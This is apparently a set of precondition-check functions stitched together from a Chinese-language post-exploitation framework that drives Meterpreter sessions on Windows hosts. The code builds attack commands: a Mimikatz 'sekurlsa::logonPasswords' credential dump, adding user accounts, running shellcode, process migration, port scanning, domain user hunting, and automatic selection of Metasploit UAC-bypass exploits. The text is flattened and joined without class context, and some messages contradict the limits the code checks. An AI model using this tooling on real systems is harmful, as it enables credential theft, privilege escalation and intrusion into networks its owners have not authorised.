def check(self): """执行前的检查函数""" script = self.get_option_filename() if script is None: return False, "请选择执行shellcode文件,文件后缀必须为bin" else: self.set_option(key='SHELLCODE_FILE', value=script) self.set_option(key='CHANNELIZED', value=self.param('CHANNELIZED')) wait_ouput = self.param('WAIT_OUTPUT') if wait_ouput < 3: wait_ouput = 3 elif wait_ouput > 180: wait_ouput = 180 self.set_option(key='WAIT_OUTPUT', value=wait_ouput) self.set_option(key='KILL', value=self.param('KILL')) from PostModule.lib.Session import Session session = Session(self._sessionid) if session.is_alive: pass else: return False, "Session不可用" if session.is_windows: pass else: return False, "模块只支持Windows系统" if self.param('ARCH') in ["x86", "x64"]: self.set_option(key='ARCH', value=self.param("ARCH")) else: return False, "Arch输入错误" return True, None
def check(self): """执行前的检查函数""" session = Session(self._sessionid) if session.is_windows: return True, None else: return False, "此模块只支持Windows的Meterpreter"
def check(self): """执行前的检查函数""" session = Session(self._sessionid) if session.is_windows is not True: return False, "模块只支持Windows的Meterpreter" if session.is_admin is not True: return False, "模块需要管理员权限,请尝试提权" computerName = self.param('ComputerName') mimikatzCommand = self.param('MimikatzCommand') largeOutPut = self.param('LargeOutPut') self.set_largeoutput(largeOutPut) if mimikatzCommand is None: mimikatzCommand = 'privilege::debug sekurlsa::logonPasswords exit' if computerName is None: execute_string = "Invoke-Mimikatz -Command '{}'".format(mimikatzCommand) else: if session.is_in_domain is not True: return False, "如果需要抓取域内远程主机的密码信息,Session必须在域中" execute_string = "Invoke-Mimikatz -Command '{}' -ComputerName {}".format(mimikatzCommand, computerName) self.set_execute_string(execute_string) return True, None
def check(self): """执行前的检查函数,函数必须返回值""" username = self.param('UserName') password = self.param('Password') computername = self.param('ComputerName') groupname = self.param('GroupName') domain = self.param('Domain') from PostModule.lib.Session import Session session = Session(self._sessionid) if session.is_windows is not True: return False, "模块只支持Windows的Meterpreter" if computername is not None: execute_string = "Add-NetUser -UserName {} -Password {} -ComputerName {}".format(username, password, computername) elif groupname is not None and domain is not None: if session.is_in_domain: execute_string = "Add-NetUser -UserName {} -Password {} -GroupName {} -Domain {}".format( username, password, groupname, domain) else: return False, "模块只支持Windows的Meterpreter,且必须在域中" else: execute_string = "Add-NetUser -UserName {} -Password {}".format(username, password) self.set_execute_string(execute_string) return True, None
def check(self): """执行前的检查函数""" from PostModule.lib.Session import Session session = Session(self._sessionid) if session.is_alive: return True, None else: return False, "当前Session不可用"
def check(self): """执行前的检查函数""" session = Session(self._sessionid) if session.is_in_domain is not True: return False, "模块只支持Windows的Meterpreter,且必须在域中" groupName = self.param('GroupName') execute_string = "Get-NetGroupMember -GroupName {}".format(groupName) self.set_execute_string(execute_string) return True, None
def check(self): from PostModule.lib.Session import Session """执行前的检查函数""" session = Session(self._sessionid) if session.is_in_domain: self.set_execute_string('Get-NetDomainController | ConvertTo-JSON -maxDepth 1') return True, None else: return False, "此模块只支持Windows的Meterpreter,且必须在域中"
def check(self): from PostModule.lib.Session import Session """执行前的检查函数""" session = Session(self._sessionid) if session.is_in_domain: self.set_execute_string('Get-Domain | ConvertTo-JSON -maxDepth 1') return True, None else: return False, "Session必须在域中"
def check(self): """执行前的检查函数""" from PostModule.lib.Session import Session session = Session(self._sessionid) if session.is_in_domain: self.set_execute_string('Get-NetGroup') return True, None else: return False, "模块只支持Windows的Meterpreter,且必须在域中"
def check(self): """执行前的检查函数""" # session 检查 from PostModule.lib.Session import Session self.session = Session(self._sessionid) if self.session.is_alive is not True: return False, "当前session不可用" # 参数检查 startip = self.param('startip') stopip = self.param('stopip') port_list = self.param('port_list') timeout = self.param('timeout') connect_time_out = self.param('connect_time_out') max_threads = self.param('max_threads') # 检查ip地址 try: ipnum = self.dqtoi(stopip) - self.dqtoi(startip) if ipnum > 256: return False, "扫描IP范围过大(超过256),请缩小范围" elif ipnum < 0: return False, "输入的起始IP与结束IP有误,请重新输入" self.set_script_param('startip', startip) self.set_script_param('stopip', stopip) except Exception as E: return False, "输入的IP格式有误,请重新输入" # 检查port_list try: list_str = "[{}]".format(port_list) port_list_net = json.loads(list_str) if len(port_list_net) > 100: return False, "扫描端口数量过大(超过100),请缩小范围" elif len(port_list_net) <= 0: return False, "输入的端口列表有误,请重新输入" port_list_tmp = port_list_net for port in port_list_tmp: if 0 < port <= 65535: pass else: port_list_net.remove(port) self.set_script_param('port_list', port_list_net) except Exception as E: return False, "输入的端口列表有误,请重新输入" # 检查timeout if timeout <= 0 or timeout > 600: return False, "输入的模块超时时间有误(最大值600),请重新输入" if connect_time_out <= 0 or connect_time_out > 3000: return False, "输入的连接超时时间有误(最大值3000),请重新输入" if max_threads <= 0 or max_threads > 20: return False, "输入的扫描线程数有误(最大值20),请重新输入" self.set_script_param('time_out', connect_time_out / 1000) self.set_script_param('max_threads', max_threads) self.set_script_timeout(timeout) return True, None
def check(self): """执行前的检查函数""" session = Session(self._sessionid) if not session.is_windows: return False, "模块只支持Meterpreter类型的Session" if not session.is_in_domain: return False, "模块初始Sesion必须在域中" if not session.is_admin: return False, "模块初始Sesion必须拥有本地管理员权限" return True, None
def check(self): """执行前的检查函数""" from PostModule.lib.Session import Session self.session = Session(self._sessionid) if self.session.is_windows is not True: return False, "此模块只支持Windows的Meterpreter" if self.session.is_admin is not True: return False, "此模块需要管理员权限,请尝试提权" return True, None
def check(self): """执行前的检查函数""" from PostModule.lib.Session import Session session = Session(self._sessionid) if not session.is_windows: return False, "模块只支持Windows的Meterpreter" if session.is_admin is True: self.set_option('TECHNIQUE', self.param('TECHNIQUE')) return True, None else: return False, "模块需要管理员权限,请尝试使用UAC绕过模块"
def check(self): """执行前的检查函数""" from PostModule.lib.Session import Session session = Session(self._sessionid) if session.is_windows: pass else: return False, "此模块只支持Meterpreter类型的Session" self.set_payload_by_handler() if 'windows' not in self.opts.get('PAYLOAD').lower(): return False, "选择handler错误,建议选择windows平台的handler" return True, None
def check(self): """执行前的检查函数""" from PostModule.lib.Session import Session session = Session(self._sessionid) if not session.is_windows: return False, "此模块只支持Windows的Meterpreter" if not session.is_admin: return False, "模块要求最低权限为管理员权限,如需低权限进程迁移,请选择<Session克隆>模块" flag = self.set_payload_by_handler() if not flag: return False, "Handler设置失败,请重新设置" return True, None
def check(self): """执行前的检查函数""" session = Session(self._sessionid) if session.is_windows is not True: return False, "模块只支持Windows的Meterpreter" computerName = self.param('ComputerName') if computerName is None: execute_string = "Get-NetProcess" else: if session.is_in_domain: execute_string = "Get-NetProcess -ComputerName {}".format(computerName) else: return False, "模块只支持Windows的Meterpreter,且必须在域中" self.set_execute_string(execute_string) return True, None
def check(self): """执行前的检查函数""" DarkGuardian_path = self.param("DarkGuardian_path") self.set_option(key='DarkGuardian_path', value=DarkGuardian_path) from PostModule.lib.Session import Session session = Session(self._sessionid) if session.is_alive: pass else: return False, "Session不可用" if session.is_windows: pass else: return False, "模块只支持Windows系统" return True, None
def check(self): """执行前的检查函数""" action = self.param("action") from PostModule.lib.Session import Session session = Session(self._sessionid) if session.is_alive: pass else: return False, "Session不可用" if session.is_admin: pass else: return False, "模块需要系统管理员权限" self.set_option("Action", action) return True, None
def check(self): """执行前的检查函数""" from PostModule.lib.Session import Session session = Session(self._sessionid) if session.is_windows: pass else: return False, "此模块只支持Meterpreter类型的Session" self.set_option("ADDTODOMAIN", self.param("ADDTODOMAIN")) self.set_option("USERNAME", self.param("USERNAME")) self.set_option("PASSWORD", self.param("PASSWORD")) self.set_option("GROUP", self.param("GROUP")) self.set_option("TOKEN", self.param("TOKEN")) return True, None
def update_domain_hosts_has_session(self): """更新已获取权限列表""" sessions = SessionList.list_sessions() for domain_host in self.domain_hosts: for one_session in sessions: # 如果session_host存在于主机的列表中,再进行进一步权限检查 if one_session.get('session_host') in domain_host.get( 'ipaddress'): session_intent = Session(one_session.get('id')) if session_intent.is_admin: # 检查是否获取了admin权限 # 去重添加 if domain_host not in self.domain_hosts_has_session: self.domain_hosts_has_session.append(domain_host) self.log_good( "发现新可用Session,SID:{} IP:{} 主机名:{}".format( session_intent.sessionid, session_intent.session_host, session_intent.computer))
def check(self): """执行前的检查函数""" script = self.get_option_filename() if script is None: return False, "请选择执行的脚本,脚本后缀必须为py或pyc" self.set_script(script) timeout = self.param("timeout") # 检查timeout if timeout < 5 or timeout > 3600: return False, "输入的模块超时时间有误(最小值60,最大值3600),请重新输入" self.set_script_timeout(timeout) from PostModule.lib.Session import Session session = Session(self._sessionid) if session.is_alive: return True, None else: return False, "Session不可用"
def check(self): """执行前的检查函数""" self.session = Session(self._sessionid, uacinfo=True) if self.session.is_in_domain: pass else: return False, "选择的Session不在域中,请重新选择Session" # 检查权限 if self.session.is_in_admin_group is not True: return False, "当前Session用户不在本地管理员组中,无法执行模块" threads = self.param('Threads') if 1 <= threads <= 20: pass else: return False, "扫描线程设置错误,请重新设置" self.clean_log() return True, None
def check(self): """执行前的检查函数""" from PostModule.lib.Session import Session session = Session(self._sessionid) if not session.is_windows: return False, "此模块只支持Windows的Meterpreter" exe_file = self.get_option_filename() if exe_file is None: return False, "请选择执行exe文件,文件后缀必须为exe" else: self.set_option(key='ASSEMBLY', value=exe_file) arguments = self.param("ARGUMENTS") self.set_option(key='ARGUMENTS', value=arguments) wait = self.param("WAIT") self.set_option(key='WAIT', value=wait) kill = self.param("KILL") self.set_option(key='KILL', value=kill) return True, None
def check(self): """执行前的检查函数""" self.set_script("KBCollects.ps1") timeout = self.param("timeout") # 检查timeout if timeout < 5 or timeout > 3600: return False, "输入的模块超时时间有误(最小值60,最大值3600),请重新输入" self.set_script_timeout(timeout) from PostModule.lib.Session import Session session = Session(self._sessionid) if session.is_alive: pass else: return False, "Session不可用" if session.is_windows: return True, None else: return False, "模块只支持Windows系统"
def check(self): """执行前的检查函数""" session = Session(self._sessionid) if session.is_in_domain is not True: return False, "模块只支持Windows的Meterpreter,且Session所属用户必须在域中" if session.is_admin is not True: return False, "Session权限不足,请选择管理员权限Session" if session.domain is None: return False, "无法获取Session所在域" threads = self.param('threads') if 1 <= threads <= 20: pass else: return False, "扫描线程参数不正确,请重新设置" # 设置参数 execute_string = "Find-DomainUserLocation -Domain {} -Threads {} -StopOnSuccess| ConvertTo-JSON -maxDepth 2".format( session.domain, threads) self.set_execute_string(execute_string) return True, None
def check(self): """执行前的检查函数""" session = Session(self._sessionid) if session.is_windows is not True: return False, "此模块只支持Windows的Meterpreter" computerName = self.param('ComputerName') if computerName is not None: if session.is_in_domain: execute_string = "Get-NetLoggedon -ComputerName {} | ConvertTo-JSON -maxDepth 2".format( computerName) else: return False, "当填写'主机名'时Session必须在域中" elif self.param('Range'): if session.is_in_domain: execute_string = 'Get-DomainComputer | Get-NetLoggedon | ConvertTo-JSON -maxDepth 2' else: return False, "Session必须在域中" else: execute_string = 'Get-NetLoggedon | ConvertTo-JSON -maxDepth 2' self.set_execute_string(execute_string) return True, None
def check(self): """执行前的检查函数""" from PostModule.lib.Session import Session session = Session(self._sessionid, rightinfo=True, uacinfo=True) self.session = session if session.is_windows: pass else: return False, "模块只支持Meterpreter类型的Session" # 检查权限 if session.is_admin or session.is_system: return False, "当前Session已获取管理员权限,无需执行模块" if session.is_in_admin_group is not True: return False, "当前Session用户不在管理员组中,无法执行模块" # 检查UAC设置 if session.is_uac_enable is not True: return False, "当前Session用户所在主机未开启UAC或UAC情况未知,无需执行模块" if session.uac_level in [ Session.UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, Session.UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, Session.UAC_PROMPT_CREDS, Session.UAC_PROMPT_CONSENT ]: return False, "当前Session用户设置的UAC级别为过高,无法执行模块" # 检查integrity_level if session.integrity is None or session.integrity == 'low': return False, "当前Session的完整性级别过低,无法执行模块" flag = self.set_payload_by_handler() if 'windows' not in self.opts.get('PAYLOAD').lower(): return False, "选择handler错误,建议选择windows平台的handler" # 检查handler和arch是否对应 host_arch = session.arch try: if host_arch == 'x64': if 'x64' not in self.opts.get('PAYLOAD'): return False, "选择handler的arch错误,建议选择x64平台的handler" else: if 'x64' in self.opts.get('PAYLOAD'): return False, "选择handler的arch错误,建议选择x86平台的handler" except Exception as E: return False, "handler检查失败,请正确设置handler" # 通过适用的操作系统进行正则匹配 host_os = session.os re_list = [ { 'type': 'exploit', 'mname': 'windows/local/bypassuac_comhijack', 'os_re': 'Windows (7|8|10|2008|2012|2016)', "arch_list": ["x86", "x64"], }, { 'type': 'exploit', 'mname': 'windows/local/bypassuac_dotnet_profiler', 'os_re': 'Windows (7|8|2008|2012|10)', "arch_list": ["x64"], }, { 'type': 'exploit', 'mname': 'windows/local/bypassuac_eventvwr', 'os_re': 'Windows (7|8|2008|2012|10)', "arch_list": ["x86", "x64"], }, { 'type': 'exploit', 'mname': 'windows/local/bypassuac_fodhelper', 'os_re': 'Windows (10)', "arch_list": ["x86", "x64"], }, { 'type': 'exploit', 'mname': 'windows/local/bypassuac_injection', 'os_re': 'Windows (7|8|2008|2012|10)', "arch_list": ["x86", "x64"], }, { 'type': 'exploit', 'mname': 'windows/local/bypassuac_injection_winsxs', 'os_re': 'Windows (8|10)', "arch_list": ["x86", "x64"], }, { 'type': 'exploit', 'mname': 'windows/local/bypassuac_sdclt', 'os_re': 'Windows (Vista|7|8|2008|2012|2016|10)', "arch_list": ["x64"], }, { 'type': 'exploit', 'mname': 'windows/local/bypassuac_silentcleanup', 'os_re': 'Windows (Vista|7|8|2008|2012|2016|10)', "arch_list": ["x86", "x64"], }, { 'type': 'exploit', 'mname': 'windows/local/bypassuac_sluihijack', 'os_re': 'Windows (8|10)', "arch_list": ["x86", "x64"], }, { 'type': 'exploit', 'mname': 'windows/local/bypassuac_vbs', 'os_re': 'Windows (7|2008)', "arch_list": ["x86", "x64"], }, { 'type': 'exploit', 'mname': 'windows/local/bypassuac', 'os_re': 'Windows Vista|Windows 2008|Windows [78]', "arch_list": ["x86", "x64"], }, ] import re for one in re_list: if re.search(one.get('os_re'), host_os) is not None: if host_arch in one.get('arch_list'): self.module_path_list.append(one) if len(self.module_path_list) == 0: return False, "未找到符合要求的模块,退出执行" module_select = self.param('module_select') tmprecord = None if module_select != 'auto' and module_select != "check": # 不是自动模式 for one in self.module_path_list: if one.get('mname') == module_select: tmprecord = [one] if tmprecord is None: return False, "选择的Bypass方法不符合Session要求,退出执行" else: self.module_path_list = tmprecord self.opts["SESSION"] = self._sessionid return True, None